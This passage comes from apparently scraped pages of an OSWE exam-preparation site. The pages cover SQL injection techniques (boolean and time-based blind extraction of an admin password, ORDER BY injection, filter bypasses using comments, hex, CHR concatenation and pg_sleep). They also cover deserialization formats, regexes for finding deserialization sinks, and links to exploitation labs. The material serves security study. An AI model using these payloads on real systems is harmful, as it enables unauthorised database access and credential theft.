many times as possible, giving back as needed (greedy) \. matches the character . literally (case sensitive) \+ matches the character + literally (case sensitive) .* matches any character (except for line terminators) * Quantifier — Matches between zero and unlimited times, as many times as possible, giving back as needed (greedy) Match a single character present in the list ['"] '" matches a single character in the list '" (case sensitive) Match a single character present in the list [%s]* * Quantifier — Matches between zero and unlimited times, as many times as possible, giving back as needed (greedy) %s matches a single character in the list %s (case sensitive) .* matches any character (except for line terminators) * Quantifier — Matches between zero and unlimited times, as many times as possible, giving back as needed (greedy) 1st Capturing Group (SELECT|UPDATE|INSERT|DELETE|WHERE|ORDER) .* matches any character (except for line terminators) * Quantifier — Matches between zero and unlimited times, as many times as possible, giving back as needed (greedy) Match a single character present in the list [%s]* Match a single character present in the list ['"] * matches the character (space) literally (case sensitive) Match a single character present in the list [\.\+] [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources) Last updated 6 years ago --- # Injection by clause | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause.md) . WHERE (most common)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#where-most-common) -------------------------------------------------------------------------------------------------------------------------------------------------------- ### Boolean[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#boolean) Copy [...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y; ### Blind Time-Based[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#blind-time-based) Copy [...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337); ORDER BY[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#order-by) ------------------------------------------------------------------------------------------------------------------------------------ ### Boolean[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#boolean-1) Copy [...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END)); * Depending on the order of the displayed contents, the subquery would be true or false. * Extra information [here](https://hackmd.io/@Chivato/H10RbVZRH#Injection-point-being-the-ORDER-BY-clause) . ### Blind Time-Based[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#blind-time-based-1) Copy [...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337)); * The provided seconds to the sleep function would be multiplied to the returning rows of the main query. [PreviousTypes](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types) [NextBypassing Character Restrictions](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions) Last updated 6 years ago * [WHERE (most common)](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#where-most-common) * [Boolean](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#boolean) * [Blind Time-Based](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#blind-time-based) * [ORDER BY](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#order-by) * [Boolean](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#boolean-1) * [Blind Time-Based](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause#blind-time-based-1) --- # JAVA | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java.md) . [Regex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex) [Summary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/summary) [PreviousBy Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language) [NextRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language/java/regex) Last updated 6 years ago --- # Types | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types.md) . Boolean[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#boolean) -------------------------------------------------------------------------------------------------------------------- This injection consists of the boolean result of a query making the website return different responses. For example, a query that returns the products following a specific criteria (e.g. category) would always return the intended results unless the query gets appended an injection adding more specifications to match. Let's imagine having this background: Copy SELECT id, name, price FROM products WHERE category = '$supplied_category'; If the supplied category exists, and it will the most of the times, as every page having this structure would let the user choose the category between the intended ones, the products will be printed in the response. However, in the case that the supplied parameter is not propperly sanitized, someting like this could happen: Copy SELECT id, name, price FROM products WHERE category = 'sports' AND 1=1; This won't change the behaviour of the response, as there are sports products and 1 equals 1, but what about this? Copy SELECT id, name, price FROM products WHERE category = 'sports' AND price > 24; This will certainly change the response, as only those sports products whose price is higher that 24 will appear. Now is when more complex injections pitch in. ### Subqueries[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#subqueries) Copy SELECT id, name, price FROM products WHERE category = 'sports' AND (SELECT password FROM user_table WHERE username = 'admin')='adminpwd'; This time, the actual query gets appended a [subquery](https://www.w3resource.com/mysql/subqueries/index.php) being compared to a value. If the admin password equals to adminpwd, the website will be returning the same products as before, otherwise, it would be returning no results. ### SUBSTR[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#substr) However, using subqueries is not that easy, sometimes the values aren't so guessable, that's why substr() function is useful here. Copy SELECT id, name, price FROM products WHERE category = 'sports' AND SUBSTR((SELECT password FROM user_table WHERE username = 'admin'),1,1)='a'; As you can see, the way this function works is quite the same as it does in most of the languages. * Notice that another pair of parenthesis is added to the subquery, as it is not a single parameter. In a nuthsell, the first letter is being compared to an a. If it does start by an a, the server would return the intended sports products result. Doing this by iterating through a dictionary (and leveraging the compared position of the letter) could be useful to obtain the entire value. However, there's a problem, it is not case sensitive! ### ASCII + SUBSTR[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#ascii--substr) This is the most powerful way to ensure the retrieved data is correct. As you can see, the compared number is an ASCII number now, and the result of the substr of the subquery is converted to ASCII. Thanks to this technique, we can now iterate over the whole range of ASCII characters from 32 to 125. Blind Time-Based[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#blind-time-based) -------------------------------------------------------------------------------------------------------------------------------------- This type of injection is almost the same as the Boolean one, but involving server-side time waiting. ### Fast Example[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#fast-example) #### Empty set (10.001 sec)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#empty-set-10.001-sec) This result means that the last AND operator has been executed and the sleep() function too, so the subquery equals the compared value. Obviously, as everything in this field, it can be used in lots of cases and tons of ways. [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/summary) [NextInjection by clause](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause) Last updated 6 years ago * [Boolean](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#boolean) * [Subqueries](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#subqueries) * [SUBSTR](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#substr) * [ASCII + SUBSTR](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#ascii--substr) * [Blind Time-Based](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#blind-time-based) * [Fast Example](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/types#fast-example) Copy SUBSTR( PARAM_TO_EVALUATE, STARTING_POINT, ENDING_POINT ) Copy SELECT id, name, price FROM products WHERE category = 'sports' AND ASCII(SUBSTR((SELECT password FROM user_table WHERE username = 'admin'),1,1))=97; Copy SELECT id, name, price FROM products WHERE category = 'sports' AND (SELECT password FROM user_table WHERE username = 'admin')='adminpwd' AND SLEEP(10); --- # Bypassing Character Restrictions | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions.md) . General[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#general) ----------------------------------------------------------------------------------------------------------------------------------------------- ### Space -> Comment[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#space-greater-than-comment) Copy SELECT id, user, password FROM users WHERE id = '1'; Copy SELECT/**/id,/**/user,/**/password/**/FROM/**/users/**/WHERE/**/id/**/=/**/'1'; ### Upper and Lower case[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#upper-and-lower-case) Copy SELECT id, user, password FROM users WHERE id = '1'; Copy SeLeCT id, user, password frOM users WHeRe id = '1'; MySQL[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#mysql) ------------------------------------------------------------------------------------------------------------------------------------------- ### Hexadecimal[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#hexadecimal) Copy SELECT 0x6a6f726765637466 #SELECT 'jorgectf' PostgreSQL[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#postgresql) ----------------------------------------------------------------------------------------------------------------------------------------------------- ### ASCII concatenation[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#ascii-concatenation) ### Single Quote Bypass using $$[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#single-quote-bypass-using-usdusd) ### Unicode[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#unicode) More information[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#more-information) ----------------------------------------------------------------------------------------------------------------------------------------------------------------- [SQLMap Tamper Scripts (SQL Injection and WAF bypass) TipsMedium](https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3) [PreviousInjection by clause](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/injection-by-clause) [NextBy Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/by-language) Last updated 6 years ago * [General](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#general) * [Space -> Comment](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#space-greater-than-comment) * [Upper and Lower case](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#upper-and-lower-case) * [MySQL](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#mysql) * [Hexadecimal](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#hexadecimal) * [PostgreSQL](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#postgresql) * [ASCII concatenation](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#ascii-concatenation) * [Single Quote Bypass using $$](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#single-quote-bypass-using-usdusd) * [Unicode](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#unicode) * [More information](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/bypassing-character-restrictions#more-information) Copy print('||'.join("CHR("+str(ord(i))+")" for i in "jorgectf")) Copy SELECT CHR(106)||CHR(111)||CHR(114)||CHR(103)||CHR(101)||CHR(99)||CHR(116)||CHR(102) #SELECT jorgectf Copy $$jorgectf$$ #'jorgectf' > AND $$jorgectf$$ = 'jorgectf' AND (SELECT 1 FROM pg_sleep(10))=1 0:00:10.491213 Copy SELECT U&"\006a\006f\0072\0067\0065\0063\0074\0066" #SELECT jorgectf SELECT U&'\006a\006f\0072\0067\0065\0063\0074\0066' #SELECT 'jorgectf' U&'\006a\006f\0072\0067\0065\0063\0074\0066'() #jorgectf() --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/summary.md) . Copy O:len(class_name):"class_name":len(properties_to_edit):{s:len(variable_name):"variable_name";s:len(variable_value):"variable_value";} [Exploiting PHP deserializationMedium](https://medium.com/swlh/exploiting-php-deserialization-56d71f03282a) [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/regex) [NextPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice) Last updated 6 years ago --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/regex.md) . Copy unserialize\(.*(\$)* [PreviousPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/summary) Last updated 6 years ago --- # Practice | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice.md) . [GitHub - NickstaDB/DeserLab: Java deserialization exploitation lab.GitHub](https://github.com/NickstaDB/DeserLab) [https://www.thedarksource.com/vulnerable-java-deserialization-lab-setup-for-practice-exploitation/www.thedarksource.com](https://www.thedarksource.com/vulnerable-java-deserialization-lab-setup-for-practice-exploitation/) [GitHub - joaomatosf/JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).GitHub](https://github.com/joaomatosf/JavaDeserH2HC) Practising Serialbrute in DeserLab[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice#practising-serialbrute-in-deserlab) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ [Java Deserialization HOWTOrandomlinuxtech.blogspot.com](http://randomlinuxtech.blogspot.com/2017/08/java-deserialization-howto.html) [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources) Last updated 6 years ago --- # Deserialization | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization.md) . [By Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language) [Resources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/resources) [PreviousResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/sql-injection/resources) [NextBy Language](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language) Last updated 6 years ago --- # Practice | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice.md) . #### Deserialization + SQLite Injection[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/practice#deserialization--sqlite-injection) [#WebSec Level Fourwebsec.fr](http://websec.fr/level04/index.php) `Cereal Logger` at: [247CTF - The game never stops247CTF](https://247ctf.com/) [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/deserialization/summary) [NextJAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources.md) . Cheatsheets[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#cheatsheets) --------------------------------------------------------------------------------------------------------------------------------------------------- [https://book.hacktricks.xyz/pentesting-web/deserialization#java-httpbook.hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/deserialization#java-http) [Java-Deserialization-Cheat-Sheet/README.md at master · GrrrDog/Java-Deserialization-Cheat-SheetGitHub](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) Ysoserial Bruteforcer[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#ysoserial-bruteforcer) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------- [SerialBrute/SerialBrute.py at master · NickstaDB/SerialBruteGitHub](https://github.com/NickstaDB/SerialBrute/blob/master/SerialBrute.py) Articles[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#articles) --------------------------------------------------------------------------------------------------------------------------------------------- [https://twitter.com/jorge\_ctf/status/1285240301620273156twitter.com](https://twitter.com/jorge_ctf/status/1285240301620273156) [Exploiting Blind Java Deserialization with Burp and YsoserialCoalfire](https://www.coalfire.com/The-Coalfire-Blog/Sept-2018/Exploiting-Blind-Java-Deserialization) [Tricking blind Java deserialization for a treatSecurity Café](https://securitycafe.ro/2017/11/03/tricking-java-serialization-for-a-treat/) [Java Deserialization Attacks with BurpNetSPI](https://blog.netspi.com/java-deserialization-attacks-burp/) [Loading...www.thedarksource.com](https://www.thedarksource.com/java-deserialization-vulnerability-detection-and-exploitation-burp-suite/) [PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/practice) [Next.NET](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net) Last updated 6 years ago * [Cheatsheets](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#cheatsheets) * [Ysoserial Bruteforcer](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#ysoserial-bruteforcer) * [Articles](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/resources#articles) --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex.md) . Copy ((JavaScript|Xml|(Net)*DataContract)Serializer|(Binary|ObjectState|Los|Soap|Client|Server)Formatter|Json.Net|YamlDotNet|FastJson|Xaml|TypeNameHandling|SimpleTypeResolver|(Serialization|Deerialize|UnsafeDeserialize)|(ComponentModel.Activity|Load|Activity.Load)|ResourceReader|(ProxyObject|DecodeSerializedObject|DecodeValue)|ServiceStack.Text) List[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex#list) --------------------------------------------------------------------------------------------------------------------------------- * `(JavaScript|Xml|(Net)*DataContract)Serializer` * `(Binary|ObjectState|Los|Soap|Client|Server)Formatter` * `Json.Net` * `YamlDotNet` * `FastJson` * `Xaml` * `TypeNameHandling` * `SimpleTypeResolver` * `(Serialization|Deerialize|UnsafeDeserialize)` * `(ComponentModel.Activity|Load|Activity.Load)` * `ResourceReader` * `(ProxyObject|DecodeSerializedObject|DecodeValue)` * `ServiceStack.Text` [Previous.NET](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary) Last updated 6 years ago --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary.md) . Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary#basic-.net-deserialization-objectdataprovider-gadget-expandedwrapper-and-json.net) ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.netbook.hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net) [PreviousRegex](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/regex) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/resources) Last updated 6 years ago --- # Vulnerable Libraries' Implementation | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation.md) . javax.xml.transform.Transformer[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java/vulnerable-libraries-implementation#javax.xml.transform.transformer) --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- "_Can occur when a_ `_javax.xml.transform.Transformer_` _is created without enabling "Secure Processing" or when one is created without disabling resolving of both external DTDs and DTD entities._" [https://rules.sonarsource.com/java/RSPEC-4435rules.sonarsource.com](https://rules.sonarsource.com/java/RSPEC-4435) [PreviousJava](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/resources) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/resources.md) . [https://book.hacktricks.xyz/pentesting-web/deserialization#netbook.hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/deserialization#net) [PreviousSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/.net/summary) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/resources) Last updated 6 years ago --- # Practice | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/practice.md) . [PreviousPHP](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php) [NextResources](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/resources) Last updated 6 years ago --- # Resources | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/resources.md) . [From XXE to RCE with PHP/expect — The Missing LinkMedium](https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7) [h1-5411-CTF disclosed on HackerOne: RCE via Local File Read -> php...HackerOne](https://hackerone.com/reports/415501) [PreviousPractice](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/php/practice) [NextJava](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/xxe/by-language/java) Last updated 6 years ago --- # Regex | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex.md) . Copy (.*readObject\(.*|java.beans.XMLDecoder|com.thoughtworks.xstream.XStream|.*\.fromXML\(.*\)|com.esotericsoftware.kryo.io.Input|.readClassAndObject\(.*|.readObjectOrNull\(.*|com.caucho.hessian.io|com.caucho.burlap.io.BurlapInput|com.caucho.burlap.io.BurlapOutput|org.codehaus.castor|Unmarshaller|jsonToJava\(.*|JsonObjectsToJava\/.*|JsonReader|ObjectMapper\(|enableDefaultTyping\(\s*\)|@JsonTypeInfo\(|readValue\(.*\,\s*Object\.class|com.alibaba.fastjson.JSON|JSON.parseObject|com.owlike.genson.Genson|useRuntimeType|genson.deserialize|org.red5.io|deserialize\(.*\,\s*Object\.class|\.Yaml|\.load\(.*|\.loadType\(.*\,\s*Object\.class|YamlReader|com.esotericsoftware.yamlbeans) List[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/regex#list) --------------------------------------------------------------------------------------------------------------------------------- * `.*readObject\(.*` * `java.beans.XMLDecoder` * `com.thoughtworks.xstream.XStream` * `.*\.fromXML\(.*\)` * `com.esotericsoftware.kryo.io.Input` * `.readClassAndObject\(.*` * `.readObjectOrNull\(.*` * `com.caucho.hessian.io` * `com.caucho.burlap.io.BurlapInput` * `com.caucho.burlap.io.BurlapOutput` * `org.codehaus.castor` * `Unmarshaller` * `jsonToJava\(.*` * `JsonObjectsToJava\/.*` * `JsonReader` * `ObjectMapper\(` * `enableDefaultTyping\(\s*\)` * `@JsonTypeInfo\(` * `readValue\(.*\,\s*Object\.class` * `com.alibaba.fastjson.JSON` * `JSON.parseObject` * `com.owlike.genson.Genson` * `useRuntimeType` * `genson.deserialize` * `org.red5.io` * `deserialize\(.*\,\s*Object\.class` * `\.Yaml` * `\.load\(.*` * `\.loadType\(.*\,\s*Object\.class` * `YamlReader` * `com.esotericsoftware.yamlbeans` [PreviousJAVA](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java) [NextSummary](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary) Last updated 6 years ago --- # Summary | AWAE - OSWE Preparation / Resources For the complete documentation index, see [llms.txt](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/llms.txt) . This page is also available as [Markdown](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary.md) . Structure[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#structure) --------------------------------------------------------------------------------------------------------------------------------------------- Copy $ javac POC.java ; java POC POC Serialized object saved to serialized.object  hexdump -C serialized.object The starting bytes, `ac ed 00 05` are a known signature for JAVA serialized objects. (`rO0` Base64-Encoded) Practising with Ysoserial[](https://jorgectf.gitbook.io/awae-oswe-preparation-resources/by-vulnerability/deserialization/by-language/java/summary#practising-with-ysoserial) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [GitHub - hvqzao/java-deserialize-webapp: Vulnerable webapp testbedGitHub](https://github.com/hvqzao/java-deserialize-webapp) ### Entry 